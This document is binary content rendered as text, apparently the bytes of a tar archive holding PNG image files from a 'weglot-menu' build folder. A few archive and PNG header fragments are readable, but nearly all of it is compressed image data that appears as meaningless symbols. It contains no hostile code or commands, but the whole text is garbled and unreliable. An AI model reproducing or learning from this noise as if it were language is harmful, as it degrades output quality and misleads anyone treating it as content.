�۶M���܃F3�U���#��l�f���I��C�����0���1����/%<;��?��R�K����&��1�p��vK?I�Y�6_��̗N��D�a��s�/=�1�-�k�`��r�}�10{��I̗&��/��z�h�K�ã���ϒV:ӵ���x����0S���ݲg��)�"�_r�?����F��O&�
}^���_�,�ݳ��P�Ld����@�O�n�=��~�g���p����s�^+�_;�Ϳ_���������K�|}:�v��o?{�n��B�������
��/����U�7�Y�[�����9I�����H���(����Kdg�Ȩ�,�ǟL�{m�{�	��k�������Q����9{֮o��f���W���N��>��k��C��O�<s�].��p_/b�ߦƗv|�A�����gU�_��Py�^A��n�����/����B���W������߁�9�ن��������)�����h��u|���?�=S��a���3�y�y��oC�����Oz=���,�׏^�_������8x~��.�g�n���L�{]�(e����d~�����R�d��;�W�<�O^�1	�$���<��>�?�eទ�K�g����3x?����"��L�7?������cC�a����n����mغmܶ.̝�h�P���T���h|�n�	�>�ꇉp��W%5��Կ�x2A�/t?�Y����[�B����p�t�2n���1�p�,����������n~|;��oOr;���_��m���5��Y7�ޠ�L"����_����y?�y�~��SP���l�
p�7_{���x)���7,�{�k<��oF�/���~�W��P��;(/1��O�q��0���z��r��w�*,���_��|�}\~{�@ޒ9�V���;�!�l�������uD��OTǥ�&�7g]���9OuS��#F���}����#ܳ����c5�<Ki�[��>d����_��i�[|��m.���}a�w���k�<�mv����[`�@�?�6��f�~�d��Ɨ��j���8T(O#m�by��m7��ORv���Q�WlU���<k�4����Z�cǷI���e%4�-��!p��?�I�/�����c�pOhϽ�����n�&���|�8���f����O�ۏn�-�_����33��G��n���+c<��X���c�0`6Mp��L���;)�[�ρ�����3@���P��>Ѿ�(/4������4��_2����4��b���d��ݴ��	�gΊˈ��ᾃ���b}Ɨ�d�U�׀�4����w���z
�]X
p��.?p���/t|A�o�����O��	,���M�C�������Úq4�-��5;h����/���:9��[<ޗ�����}^C��1��u^�'���m�dv�/9_{z=����vy=8q0�~m�:������Q�@뗷lw�o�|2���
������Krտy�?��!r������/h<�7��W��C�y�A��|&	p�����ݎ��a-
p���o��m[�?3y��'���i/ry��x|�����n��H�cC���e�6��� <^��G��ݏp��'nwקPy�F�]���H��]����3_�?2`�������R�`�	����;�=����z���d�mT};���?(�|�V�Hb�6�[������zʛy�ۀ�S<ޟ�ǧ�%������^��:^2��fU�.���?ob��g�&__��O����>�6_�+�r���$q�^�;;pmv���<�D�}O�T�+a
�p�^� {��`c`Ԕa��a�0�R���\�M�/�?L��0y0���<}���)}��O�|��=?LQ�yI剙���Y9-�,��Vq[�	/`1֠���ʟ�B�G�����+�m�<�����3�ϗ�?\Şa��Կ��l������)3�����*?�Az[��$��@��Yv�&p{�~�1�=�M����>����*��c�
ׇ�[������c1�↓`���Fa|a�Z����Gn���7�>�����
�������N��|��gc���]�'�����h4
��Ͽ��� ������=����'�p�� ������{���x	ܿ{�'ǯ<�/|}�>t}
���	�g�J�p�m���E��t����y!h�u|�3�?�?{����G�n���_N�]��0^��w�>��w�?�l��0���g�|��;?�m��)��n�\v�A�`�B�4��:>��G� ��0��CI�����x���:?����������o{�ρ�5c�׹O��/p�3����ǁ���g�~��� ���0�������FO�j���K�g�����Ͻ�CV��|}�u<�@{��o��}����g�ϫ�܍?a���h�
�/p۟������m�~�W���:�?�W��|�����t}
��er���?��M�����/�=�p�?�H.�����:�o�n������r�����h9X{[i��ƟP~&l>�p�s�	�WP�=��-o�O�v
���p›���^�K�~�n�T�1`<��l���Wm}���|ܿs�K�+��������
��i,|{Z�ZGV��O��@���MHIY�&%%��ړ��'zĔ)#����:`ҤC�T����>w��~���M��曓'S�'Q�'�3y����B-,B�?���G��[�j��~��C���>3p�O����C->ҫ�P�Ò̟? 	jo�^]j�P���G��w�*?�W���+��G&h�$xv�P���?�<�HAzS��#O�->)&&�[�_���g¢E���RR<{�}�����������g��*���v}��A�	��@��'j������������E�v}�x�O<�����z���/�ȟ�/��x�o��ԧ_��P��'��y<(>�Ƌ����!�~��#�ӛg�*��(ϐ9z��?j�?�6 ̫�5p�+����������G�|�5������/��{E&�M}��x}�z�����������_�B�`�.��4��z����!1Ĩ�Oyk�P��/y_��T?aQ�$F��Z�	�PS��������_A�S����B��P�������od�~�Ez�~m�G^�'
{[������C����Y~�>��6���'���Z����_}�+b��mĭ����38�Ǣ�=̏A�
���P{�x?�o�:�	�߄�Gx��w�~tB���X��-[�+ɿi��?
��(��,LJ��ۯ�G�O���+�����o��)�"ߞ��z��@�+ _
�<�h��^�<�ӟ(˯��AW�޺2Bl
�H�{��!<3��	���~e�GO�q{����q{����q{����q{����q{����q{����q{����q{����q㴰�f���٫�=���=n���=n�����
UwZ9�
��~c�J�O:��ȑ/hH�����#=�Ԡ����v&���l�zX�"IEND�B`�weglot-menu/build/images/rect_mate.b41fa0fe.png000064400000146726151330373270015337 0ustar00�PNG


IHDR-� >NEg�PLTEGpL{�GX�c&&&9g?\�KU���R?o�v~У�1�bPq�{���5n����4m��1�F8G�Q@��W�c&&&"��]�K5K����0o��o-�L;�1$�7Q܅|��ڲ�+S����{�*�]Q��P��=t�������(W�J��w���Jkkjہy+���6(��
܏3����붰�L;�X5�RE���_����������n�|���諥������G������e�c�l5�mc�2���♔��맇.�g\��멜Yk��30*��A����|5���̜����0���^�ԿM>ߞ0��O׵8�eC��颜�ON�[f������wa�`�]�����ӳ�f��Ds��s}K�F8�S\�wn�ӭ��k��թ�=`.'�����ܢ��ˌ1�2ѧ0o\(��._a�ƴ7�ۏ�q/|�U�C3v���ں�~N�O��@�FɯK�	��r��у��{�E���ۅ.���pr��x��( ���Lx�����?3�`y��Pޡt�_=D@,���ŵww5*��rWG%F) TRT~�J�>CC�t3���`Û�`Ŏ�eSٛ�*Lz_���C5�<��Ezʄ#3̳�0��Ef����\������~5�v���Mf2��
�ҺV�B�P��W��l�)�ȑyTA>���O����M�_�4L�&:-�"[�^,������R���r�
��Z�ݵ�����}tRNSθ�V���Ǹ�ƹ���F@ʲIDATx��[TW�ﻞ��y�y��JE���l첊jX�@������;�&F**P� B�	�"������[c��՘�<��ի{�%�;�jVռ��
Q}E�ʬYc��;�7��~^�g��ŕ�7z�i�Q��W��pyw4�+O��Z�i\��6���9H��F�C���4t�h����l��F��[>'7�����fuX���o�r�4�-ôęO�9��|����1���.ny9���.����e���n��?�Ϭ�o]~֯��4��>+JN��.��9�0�;��v$v}q��k?�fy���fy`~���'������[���j���X�lݿX�;��G�Iy�s��j��1
��p�oQZﻉ�Uq{�E��#M�E~�P/��+��˂�|��b�_b�7.�ov��@�iL���p�PA��g3b��e!��ߗu����N�N6��t���N1����k,_(��aڿ`�X�k/���le��?��:r�@w���
�������'�d�e�?/��;�,>̓2�'#o��[������������#n��:��b���V��φ+x��4���c�cR���/�i��
��H�;�any�ַeN�/����s���8G����[5��p�����a\�u�4ҍD�8;^��uE߷�:~a�K���`�qi_��x3��_�_ߚ[��܌�ꅴ�o0�o�;܀�~��ʬ��+ý^�"^
���G�����X���[�>=��p�Υ��G�8���3W�o���c���|�ʠ^�+�}9����2�|�R�o�?����b��{}q�k}���p�<(Hn�Z�����&�j��&?���V~OJ&O�D����d2�%e|����c���O��[?�=�Ͽ��9?%���ˑ�w��|O���c�gG�Wxgs꙳��G�G�2�Pع���9V��?�'���������g)}�XBs��A�8� t���m�dbAR�� ���#_��&�,�홿C�s�K+
��_��Fp�w��?-��o��S��zLík�����n�1G�p㓎z?��{|�w��"l��ջ���<�Ŵ�Z�7�����+�~�w:����[j��V�lP��'N2�Ӓo
�*���eľ�_U���_��W���v���ȷb��v<����WbV��}�(����8�.?��D:�Z�~�w���
p�>~n}�s�g�ܯ3���Snٕ��7?�-����{Sn":I8��>�`O��5a�����2
�G)p+��!(c��~��[�%��̜{���q�no��p�*�uon���{� S3
�%p+p�a�>v��ê�x7�{�ޮ�r��ލW�p�1���N�1������-�*�j��
�*D��P�P����p��f/����� Z�3���UaZ�$/�7�vs;"�>@�����L��mmg��jl���1	��iox�z��5!L����!^Ѻ�p�Y���7>��-��2�;
��&�d
��
O��⶯�p���q�a�AAK��+Gܸ�w�&�y�a!I�Ҥ�0����1nEZ%XH0A�j_=�{o�[K�9^�8,�_3pk��߿[#	����_��]?��OI;��o�7e��7��7"p�����T����(��g܄nT��F���b79�=��p^U[���/�7ʁD�����R�6�o���w���+���ܻ����w�ܩ�H�\�6p���[*��إ�lQnJ~Po��/?�F"�@<���B�_K���ն�V�������}��s�	��:~N��Wb�p�G�~�n��8�h̋p���y��kpϋ��7&��Xw�Ф��-t�s�[��n8�0��1s�$��n�K����m�m{�ބ��7�&� AEe�G4Z��L`+5%xp��#�hKn�;#&�����8�ti�.�>+44�;�p�-�]:7�<�ۭق+�tg��>o��kpC������GV��d�f;nߘ�����~����
�c����
�/o��y�и_�0!^I���s,�,��CH�p����6:�&�,����|:C��ne]oBQz�9��con���2I����+Q�B��R*]3J�>�UI>��+O����
���|�,�������nn}�Tg��fL�� q��7�vK�+*�M+s:��vOPIg�ً̛�hL���'nA����x�����s!�� f�ˣ�Ggܭkָ��v��UK�{n�b��w""��7�&
�$�E>��4�[�D9���}�4��I�����nd�Y���G�Z�7O��p�^_�|$��!I�*W%I�[�J`�p��BX����������U�-�Q�$�����h���$���?炋��7~�����O��3��6��ܯ�=������p/�$�p�Y�8�f�o��p=,*�3��pD�H��@h>Q��sM�e9ަ��{zFI��r��q����3�x���mۆ%��ܸ�yG��Ͽ�=�R�ז��{`�[#�\���ߣ���?���,	�۰�]��O��6�y�Hh
P���� ��r��m�nFY;���|�*�T���6(v����f��Y��\��@��r��X7��x�"yt��,E���5�8�>���D:�G�=d����]$�o�pW���SʄS���&K״z�[���$�m�~i���&8/}�\�K�{i���9�m{nrit�p�j���e #��@���������
#���
�
�۰]z*���8��]�t=<�<���^5�{��"܉���aΝ*����K�.�'don���&I^�n
X#�h�ۅ��wg��^>�
�{��R�}����s�{���^�%K'`��Kղ����'G4��!`�p�p/o���;�Fa1��L��l�����
p��
ܧz��IhG�7__��7=����^7��.��e��#��A;��>�~b������-�j;{#��l��%X���,���}������j2=��1|X9��<3��4y�AwL�d��q���9�U7���Kf��ߥ0�4�(,�k_{���^��8X�q���2�qWZ������D
):E��|�@����[۹5k��;���^D��;R����b�npp~P�xS�hj����!ݤ
��3���}���B��!�+(�T��	wK�Gl�8ќw�LfX�7O��(����l�^��p��k��k���r�!½bŵ2�Y�EB�j9�Kඔ߶ம;��\]z����?�⋪��(7v��k|���f�7�dIY��~�n�2~�z������nI
ܒ�x`�o���,����P��P:���qv	�L]*pU�ڶ��bs�t�{�2����,i�޽K���_n0�%pp�H#��#�/��W��w�}�����_���߻޺}�0��a{�,�?�AJ��p�-�l���o�W �����JU���K��rQ�͈k����g���6�����g�4��}|��B�Z!��V�)V�X�8"�b+����Y�
�`M�W�I�z����s��2Ci�������e��K�.�H�(���{�;�Q:t�����-:�����0�	6
w�K��T
��}ƹ7��������o�p��Y��Q��������h�.OR�/�|p���JQ�%�m
pgĠ,)�T�\,��ª(���onk���k��*d1��no�%
po��_�;"��1f�
�%�����gg9�m�=�
�^>�
�/���ޡ&�W�}�X%n��-�M'`�D�x�K��#�pD��Z�/­�Q/���;j���=zt��A7���LI����U��y8T�9�-�.آ�n)����n�:YoF��con���M������b���F
�tU���J�Z��~"��x?8�F� ��=�-!�kg��ǝ�(��Z�nӮ��J]UPU~�6�L,��e5i[M��
Ûp��IhG�-������L��n��ls�n �0�c�Z��;&�
a#Б�����a�|;(��$�i�ܮ�95�Ny#��CP>V�K��R�G�wG��=�$���E�E��e�1��w2�,H·��w�Ӌ���"�Q��7��6�NF�Y4q�CyGٵ�V�Zl��4>>�+hÆ��˗DR��D
�iV7<�^�aK��,�xחf�x�#]�;,�#(X|�x�tn�����QѦ���V�j7)����Bn�;7ҍ�5����	��9_��V�87~���OE�E�֥�K
�}c?���sUz�"32"u��iK	�W�Nܑ���d��h�fq�[�
�����>�?��'^��p��o��g�$͎���tcc��F7[�-��y�xy8/.g�s��^�̥+:8�_��F��~�
ܪ�$���%½�Ώjz�uk��[�>i���x	G��Ͽ�=�c�>��#�C�ô�ޣ�q!�{�Ʒ�{����gI�i%&�����o�܂,��e@�aC>����_���w��/Vo޼�4 �3��h���|$ܦ�^�:��||a���ڵ��^x�����6khӧ%"�`�%�-]���rR'O[LdAA�;���	b��_��{��;���{�)��vpp�!���5��D�m{n���p+�#Ӌ��l-�& �.�:on�w&og�������{n%d�	����}֟8�.��ܜ��]74ޢ7�N�Ei0����+����}M�gC��-�m	p��6�:"��v�q����<�XqG�T�ۭ�M�vh���ܼ����^<�[y
���bXN��Jׅ�}7%��Z�/_>�ow^�l��Kl��h������yb��wd����W�^魯]�=N�m*�
�v�ex���j	���
G4˴̓'P���G��b�X�峾G��{�}p#_L
�-���z�U��@�9�-�&�}��:r�����y���[��S�i4jg�i�II�i��'��n�O̯�̯��;q�H�zp�1p��@�	�Me
#��Fx8�ۭP���O�y��O�0�+�4_�W ���y���mm�G�O��<�AX�@�I
1�wQ!K�޷��wlW$ގ�+f��5��&����}nٕiwtR�n�,�P�D;�ng{��������������6���w��t��&����E �?)ZWO>e���Hˑ�/����{�@K�{�5�)n	�k��1s�-]�{�njM}�R2�m�Ljs�+Oz��0i܊�w`����w�X�bz&<����[�	��r����Op�'��t�w���J��a��Au��>�(D�\-���Kɝ��!2:��i�ί��Q7�eڬ^<A�wT|pM|p|f�W�7�nR�;�w�"[Rw>�]l�����,�:3�@�<7��1
��T?}zEg:p-b�c9?��?�P���Y,��~��nW�;:R�^M�����L{nKC##� ��
�[�Y1ɡV�<�]����sr�2c�w�_��(�S���R��6'��^'�/�;����i�(�-��^�Ip;ভ�_�[�EH��^��W��6d���=޴T>��3�tA6A���@�7�YY��f�Y�	��|�vʪ-��w6����.�[D��_9�8"ܶqUϴ��{��{��R3�GF�?�qd���	\^�Q���p���[���7O��V�4Yq�ԔU����6�ٟ�n��7�~�p��kG���7}~�UB�ʟ�nan+��C������8���t��196��s0��m��J�7-�����EN��9_D1�;����z��9)�6��ʺ��/L�n��~�`Յ�<Rٶ��*��M��dn���|�l�[|���;�L[,����ڑ�p�;j}�-��u�er���/����pϋ��vܲ��KI�{>!մ��b��
oˣ�o�a���$���mZ�f��p��,1���;&�m��1w��ܒE�_[���߶����D��C��0�k�I���~�J��D��8��-=��p'�E�-��R|!�F���:��?^�p�K���pӫp����M�L�͝�v<��	d�Ԭ*���И�&�n����W�N�j�~p/஦��ji	��^еus;��[����D�d�P�~8�p?|��>n-��+`~�	���V�e&*J2�S�!��PF rKr�Nݳ���Mdh?r�'���I\��Y�' 5\"p��Qh_B�^����x����ƣ�c�U�z��7_�B�{a��ܱ�e��ݳx��d>ev
��uC��)��ݘ9s�9�e�i��5�\�V��Lu�?�iwso�ݑ�Ċ�ʊʑ������;���Wf��v\��F�w�w�4�L��nw�݆��?���n��
T;p>b��om2spt��Wפ}������[v�>����x|/�:#O4���K�v,���}�,�H1�vElcN����,?b�&h+���e����H�q�[&�]�W�^h�����Ǚm8�q���ښ��r��ie�b��s�����Ν�ƚ�
p�{�I����|�HqsK�[񑖖��#+��׬9�ݚ5�g�e�7SE�(½H�2�VB��+p3�U�O�u��_��ta܊���A�YEQ��p�C�z��C�.XPUx���i���p����!`���#3�p���ɓ'
*(>>��4��ܴy��rv~���p�^_��郍{$YTjp||p*.�-Y��f��,I4�*�k+
p�_,.�M�o�Ǔ�d"��S��Ϝ�����V���"7oEl.ק���џ��b���������q���M*�
6c�]㪖P�f(��
Ud�*H]�z)w��G|>ؽ�Ecc��o3
�F^[�[/p��L�|�3�5�iS��:�����Ij��J�����C�>3���z�!	�p7�5J��V�燰I/��p�{��5�i	�wFtCe	Բ�mϊ%�]�����%��a���������|�’B�	p�l;�y&��K�UQI���n��z�![r�J�θ,��qU�T{-"��B��J����>o�un9_iz��t���+	�W(p+w���ś7��Ep�wt߻W��̢���N�EЧ��t�{��i:��A��n��7<e������?p�p�WA���椴������ږ߹�?YA���fCXd����s0�-h?Fl��aa�p{��[�y�fO���z��#���=���-��nx���DD��;9_������}�	g���~�`�
�-,�}��͟$M���.����u�
(/<�Q�����	"��m����YZ��JW���/
�_�K� -e��H�߶��]B�2���E�1��p֎0!�.V�W�pK�A�;s;��x���"����m�����v܉�{#R="B�(½��j��<��]7_�
�Y��&�l�~:��nߛ�O\���8�.?��L��!M2pܒ�H����E�Y7�o���B<����H�$�7*�T�7�75��.{��đ��D�q�
���f�fB>QȄ[�*ێE�9�=Н��[�p�ІZe�l��
�+���ga���t縬s\��S��׽D��UY/�#�+po�~���4�	{�1X��ʌzj�"�3(��i��3>Z̆��O�	�:�L���yIW�&�Ś*tr:��28nd���|��*��M�������~}c�ѣ����&�?g��\a�~�O�i
����n	��NG�P4/�u,_df��2�ہ��Å��x���B[mp���mbb"1q����ƍ�
�0.[=��(<�JH�SO�燒�&/����17�I��Ϯ~��j�z���̵��>.:r�mS˦���|�3+Ye�>�X��Yi">���8�>B#����W�s,��͜��8�
��i�����{M�(�����A�BU��Q��F7B�����"�n��=S���d{Xm��7����<k�5�J�u&�l )Mp6�-�?���K/B�^qJ�^��HqKs��+���׬���vn͚��N�%�p/�w�^�<��uYv��'�~��/>*�[9�N�n齃�7�&�����u)��P��`��Q3bW�+�'t�ڲܲZ�t��4\�{�����x9�!5r�[^��kR�_*���/���!!<�/z}����������+�)�<�<=��<<����D��w�p�5$/vł�F���)�m��~Ԕ�v�[!'��9���a��ek��!�cW����l�}o�n�ɞ�����]���t����u�
J�H~�p+��d�2+�5��C����bwtww�������Eu~��^S�[��ǻ`@Yd·�����n�:�5�O�]nj����ɥgv�$����x?ý��^8����M���M2�1�{݊}��o7'4��o}��g�4�
�Y����ٱc�?媥����
�ǣ���b�Matk=��d��ƓEnƛD�f5<�\\�GI.4B��_4i;3vɋ6ȝpò�^��QF��}�wXi�$�[n���	�3KP��&�/zc}�H\�iwOOO{��r��'[3g�>������#O���n~��|���<]��S�Wd8�F�ۏn"�[�pnk��֮-n�R���7��� ��j�Z��3�;ـ�5���ѫh鎕w�ݱ��uc#��6L��O����S�������Fs��gl�H�{C-p��j�p�^�·������&Ҿ4�pGm�z�_��2�oifu�?�ѣmJ�m�\y"��~�?���kE��k��E�n��ZD�P�|`pK���"}�sW����H=	�k�Bv�.�.��e�rs}\|j�s�˺�\rk]j���
��-�*�tUp��"�E�|�r+��y{||�=5	�7���#8**�C��м~�N�[vf��u�u���SZ�o'�����Ų�w�'���������q���gX4���b��V�����Ōb�	p�Wlu���op�)����p/-��a
�|�66�-ԧ:b��n�pU��@��}��O��ϳ�n��=�&0�$'G�
�1$C�(��$��h���ç)���Fr/I*�6�1(�V�JmY���LV�2�	pϑ�����V���'�p��	�hj��������0ή�����4bQnۓH�?�<��0�	�ֶ_�to�?;]-�(��iQ[������~-n��)��>{�Ds��j��T��Ѷ��˩�����V�Ψ���G��ȃ���6p#1;گ�,��z,E�5�%q�%`����eL�p����V�S5�b�-��-��po�o넨z������#���j�$��"�~���. �n�5��R#��(��fy__����&...00�0��n5q���f�='9	�vs���w++**��oU��M
U���h�@��o�P��
��!��b�x�a�v��$���7�f����c��f~[Z��m�?��vo���d�wR �5�IBר4ߴ�L����៓�������Jl�Cn��kGf�w��X��8nZ��L�G;�n��e�
���O!�����#Ԉj?�-�ঽN֨��i$J��=ز�BL�RR:��	pG��[˱�*zQL������G���5%���� v.%�q'ܒD��Vp*���?���럸|��������ݯxGX���XH��1A۵�n����(����Paa�9��� {����}С�jk˺�ju�3NV:���	�ƍ�
p�l8���%S[\'�lw���
��.��,�;$��?5�Fn�������Tr�?������O�p�e��2����V��;zR�;�x(F����'�?�S�s�~i��1$c�nF~��}���vB���^��Z?�[�;NCͤ�宸Fɑ�/�.�]t��~���B�ߦ]Ե]-�G���ˆ��>S�����:N��Ӝ��`S��w�Y����o�Ώ2�?�����V�Jj����53���ю�����~�~����tG���r��B
���M�N��R�;ý���4MUEEU�H���z!����u<A_Eq�UGE巋��-��z�]�l�$����#5��߆����cG���,�����F-��&	Fn����M"��5
6ie�[��t�;���.��F�8��k!jȽ����ƒ����<A��ʒ���K�C���7!w��POh�nR,>�<�����m���J����N�U��� m�����dd��^��j�܋��3#�gT����Ҳ��}fS��&�Jğ�k�]#�]�c��O#~�����n�hoڴ�݀�n4E�z���wa�վ�%��J>O��i����z�f��?n	p�oz�u��ɳ��7��`����w�n����Iuh2P���H�^�^ygv笨<VA��덕�w�jQ��KC�/�����d�{�޵k�V��0ġs�
�U0�_��tA���`B����@�;"bpz�m�,�$��t�uu/L@�O����yD��m����6�n����Q_�c
"/��p�?�|��-��+B�kwwwQ/��X��
��i�]�r}������>.y�e�ˆ��ڮ�\@Wk �����;��ߕ�k!��R�t]��+��1J
�J3xx���y9�.��o�pW�{_�-��<���a��V{=Hp�E�����"O�p篪�D���;I��a���dg�^��RE�PE?�(����M��������������տ�78IvoYn�<���i��uK1A��^!��ׇKJ�P�8v~LNԣ=�%�mH?��"�7��H�;���1��O1�1�E5�Ɇ��Me!^������J?�*Y	A�ӎ����#Q��*'�hWCch֘c(��l
��y�����30"�g�;'�G�>�����ϺO�O��3�w���G�
8�)SZy
pnW����a�y-g�ܞ�w����._~(
p��>�B��.%^6�
��d�?˄܈�'�������<�D
M��Hm�@�IͲ�-X�p�i�K(+��Ǭu�|�n�XoU1�.>��Uc��$�������HR��
����gܡ�-a�V%[�܌�(B�w�mo<�N���k$��Z�Dj��7���c�1,޻Q���
�o6��ⲁa��h��7,ub�_78�vK�N�lJ��||��ĭ[��1R�	]m����������FC�#��r,���
SB�$���*��3��#z���!��d�� ��m�;Y��W���j��ba"�uƣl����v"���Ls�o�ܑ*>7�^��5�}&�F�&�٤%Pn��0q#��ֈ�H�s���7p��;{�Y�����v����;::Lߢ
01q˕�H|;�-%E|�-n�[u�h���[n2Խ�����X����^�Cc��f
,1H�p_����n)"�<Ŷe�n�{��C��\����!<�[1X�;�\����ya���1��qL�R|��n�CL��q��̮xhfT�(Ġ��?j_�
m�ٴJN��ܡ��Z��ܲ���!b�C�0�΍O��ǟl��ڽ�!I�7�$��	n�K�!�mW����+�;$�?>�~�p|��%�!i[�
pK��Y���"ܥj8����xol�t�������
�B*�d�v(�Sʴ\f�~q���-��B�H7#�MZ";����b[�����:P�F]áu�w���Cg��2]q����j�>��?7�E��o~�S�볘wڧW���SŰv
ְ����f�n?��[>�Uǻ!�=����{�&��R���IM�e������B�Z��O=c"甴���	n	m�O���hIHp�w�Nٮ_��ۉ�#��c�
ٜ�rL��{_Ϟݻ{$����6UMNVm�;}�w�wF2�=R���M���-�Z��X�p'v�H��������kc7�;{.WY�mQmn��>����ú�+��H�n<���LXt��b[s󃼸������)R�ڈwnnmmW-2���<�n��k���#x�U�F�R4&����N��M�}o�h�#���K^a1�w�^I�o�����2����&p��rJ{��i��B�rd���5���e���Fظfp#�vC,�?>�q5���h?���
��!���7$WL��q�+��+~��z�^���V��p�}��ŋ?��3����akfDj����Z$�ݴ��w눲��k�-Y�W��G+���$���l�׺�p���~%�MW��fܿ�m|����N�����f+�qm.�{%b���Q�$�!(P"����?��=���b����Ċ�9�������K�����^�Tk�����f�̷�>h�oׁ��m�7%½D���h�����`B�Sw�;�q��H�Ϊ|�?��f>�����W��[۷vUj��[��*ʽ���
��p?ش�D�mn	"�V���W�7#"�[%	�r�}��DB�_9��p�(����	ݒn�@g{�<7�|�k(7�+��G[���R�̥��Zܓ�!j���Vc��'��m��yTk����9�Y�gϸ_�1S��xO)f�}|D̶�U0"ŗ��8�B>��)�͟Ɠ����b@F��.����95'��{�+6�Q�b�tj�0J�\��9���{�rq`�o�t��|��2�g�p�i����[{����.��e+�E|$�R��xi���vo1fQ��	�8L���p��ۋp��d5�%p{
n{���0/�D��Y�O���q����Ƿ������p�?����?�����'�[�	���.���l"B�o��e&��sn	OAq��i��nZ���1�@���Y�,k;��bB)!5��t!��Y<��>�:��io�n{��(/T�����v'�Ԕ7��4R��:�Z|��`�	L{	�y?��b�7ny&S�B��݃[�����l�EZ�g1��
*p�JpK�:��Vl�
�
�-�>� ���i�7n�����"p; ��{

����=+p�?�����p�[��KWIo��.�Q��+%�����Fdٷ�$�J���2u��Z��*
���c�D�,�7�"�9%%4��Z
�xkzϨ�W�{l̗������	��~_	�5�~�y���-í
�6��sG�1΄��(U�y��"*�u���$�v��nh�鈺��:���3�NQ�[-p[S�.l.��6gJZ����/��]��r�]�8р�*��z.�;s;�w��2InC�=r��d�	i�i�<I
��f�yC[:����K0/y6�f�Rݝm�|DoaY��(�L�b,��=nkk����R4�t\<�U��-����L|�yA�D�ZOL����^�V
�]@$V���,�-b��Y����O�x��s�w����2�>�m�F�N�n@�L�w��0�d��7 Q��YoX��qT�1�"[0���M�HI�B���4����D���A�yrW��c*��z����*̀�^�Cui�i|�Љ��#w���?%�.��9աl�^�J��ĸ�
v����Uu��_�<�rL�<��1�����Z�*T	j}"�Fw�������E�P�ࠈwy��n?�G�)��H��`[>'1-����&�m�u��EY�r3�[߄ڗ����z_�/�V*8d�|Pb��ɽ���.mm��;
��?�)��m����p7�O����e��A�6�'Y��Q��)ny�1_o�	D�#l^�+��<�F�_#!5���g�����{��x���5kO[L�;��#>�#)h�+I�ۆ�V%��j��B[$�j�w���R��/pgܢVS_�M��_L�ߦ&��������:����h�����[�[q&$�LS�yC�M��g��&����O3������v�a����Q?%ܮ[g2�>?
3�oQ��S�8��)�?�����k6�D��)�8a��i�#�M�����Pd�I���� �o1�۟�	�k4��6�dm=��~��s�n�nE����?�ki�l��F���h�
�>�z�	��Άq�����'Ÿ�{���8ѝӞ&�n��J7"�И^5��
p+����B�M�U�-n%Ȳ�f��"I��4*
 n��~~�Pś�m��Ҟ�xn
p//0m���wt<h>��/�&�L�05���4��ø��		�L����9}��9l79�����u��+�*k
Y���(���.�4!z�p���>Y��Ɗ;7�ě$��C���
~�xt�Z�M��5�!r�'%�p��h	�X"�q�0�_d��a�����^
�ڣ��bܺ�̙�OМ.�u�����d���p�<�|�22
�������̚s1ܸ����c2�O�v����Ϗ~����ݼ�S�pi@io�zm@���ݒ�w�T�� ����w���k�x�;�6|bb�;�����'��������]�w=<��IB�^���c`���':����%��!���V�J�
JF�r�.�ï*Ek��,k���W�1VS��eZb�|�Xyc��;��]�z��f)po��^���a≏����8�w��Q���Ty�Ϗ۾{��#����@Ħ����gu0��0I��W�_k�?�$�׮�����F����e�p�}���`b��?��޿_
���J�Uq}�U���53�?�H	�|�pk6l��
�n��.U�PmW9hq���tu-�Z��;�2��+�'X�nbQ�l5-hSy~��^���:@oE~j��s�Xk�i��S��x�
��R*���۰<��=p@TQ/۪��q���9�T��ٳ��y�/�Y?8؛�[7h޲^Y��"垹N畓�Ͳ��q��*��]w��n��eMM�pӴ6y���-ga�C�{�2+T���t��Y\�D�T<�Բ �����RE,!�N;�� A������#n~{�1���%%cˏ�ǰ���%pՈ�E�*)5-H��+����!ض�����;��p�����,p?|h�iVz���fp�%.�c(ŷ���n>w���Υt�;wn��e���(*x���yH���'I���;�f��b��]�g��Gq�;��7��
N�TZ�@�n5�r$X�o�W!���pO��b�7�e�	_���ŋpO�������6{�[�M�[�E��>z�%�Bn>�dT���ƭ?����O��a�����?�P����@�������b@��;T4�E)��{�`tu�d��n	{9z<U�2��5Q!����)�}jJ���V2313�B�{��e967GE�p//��g��oc�w7�7���k:Z��\E�gp��u�2�����d���3͖���\�	(��:<Ё=KIx~�)o��2Pg�~�.��T��d>"�#�c�1���jk��K�aL3w�&��٭0pX]����ণ!h9����y{8�Uѻ�s��To!)C��Q���v(�oC�U�ԃP���:fP�B�6���JK�RK��C3�D�ϵ�3E�5�vgw'�?��z-i�|���'������A��;��ȑ��#����P	*���%U)�Tf���ȃ&LE;$ǪV�l)�"\�l�ӭ�� q~+1�X�[�سG���a�DS��PNjM�:Xo�	Y�h�y��;6>iK8�d�tK���sn��Y�	0�l�嘭�,	����)Rv�d�f0��YӤ�]N�x�+j�o*�DŋRw���`���gnq�<�L{�ϟQD�jo ��TI�9[`�E��zb��lnm]]�Ju�<"�nL�^�m�un͚���ߋ����QP%x�/w���XQ�X)?Q�e)�P���˧�E��pn�����w���+vbܱ���8n�2H<?s~8�bX�e3[�f��6�i�`�9*����F�E7��l�rZ���}�e�(}�
p'C���cc.#w��<� ʺ�G�D)Ri�Sb�rt��I�	p��C��%�,�Rl
*χ��K��fG��aY(D�}�ݸ���V2���"��a�������_�]�=�|Sl�f�l�T�p���!����]�$�mY�Hޛ���i�_[�	p��^I�ST�{���Zv+C|��;���oSk�i�m��a���Z@��P˺j�rs��R��c��`,5�����s�@d�[՟~c6�IK�����KK.�{V�iG��p�c$�}X���:~Q�B�*nn.��H:�R/m++��Ԩ���Tϰ�Ty�TEm��A��E��ʌ=hԉ������gB�u��6\����60Plܻ�رc�{{�k��u�2Mˋ���:e�I�HK ,��ᶘ52�c�޶�(�a����g;v<#8	n[�6���C�.oޜ� p�:��&���m����bB9	n�[�YX�'������5ϟ�l��-&O-"��L[�^��V�BK����=�v8�p�)f'�-f���ܽ�׳�HR�����‚$N���;ɐ.���'V�E�Z-�m�,�m0(�H��^���W����
���o[i����p��UEn^�^�&��{�Uii����V�e%���e�Ll���q�����᳀�M�t��L���G
܏�s��#���_	_�e���Y
GܧO߼y܏�|����\7Z��ҕM����n��mz��m��K?UB��}�����~g�u^gp��Ft$�	��i~����E��u�yW���0���yv�DZ��͆�9�)�W�Ui����$��2���Հµ9��n�|yӦ�6���+䭜h"�
��F�$���R�KCvܥ���&�{����N|��fD��h���dy��w������㑾�~��Wh5��\_��v|a�!ۗﭥU��h�ii�����򠖑)D��	�6���7
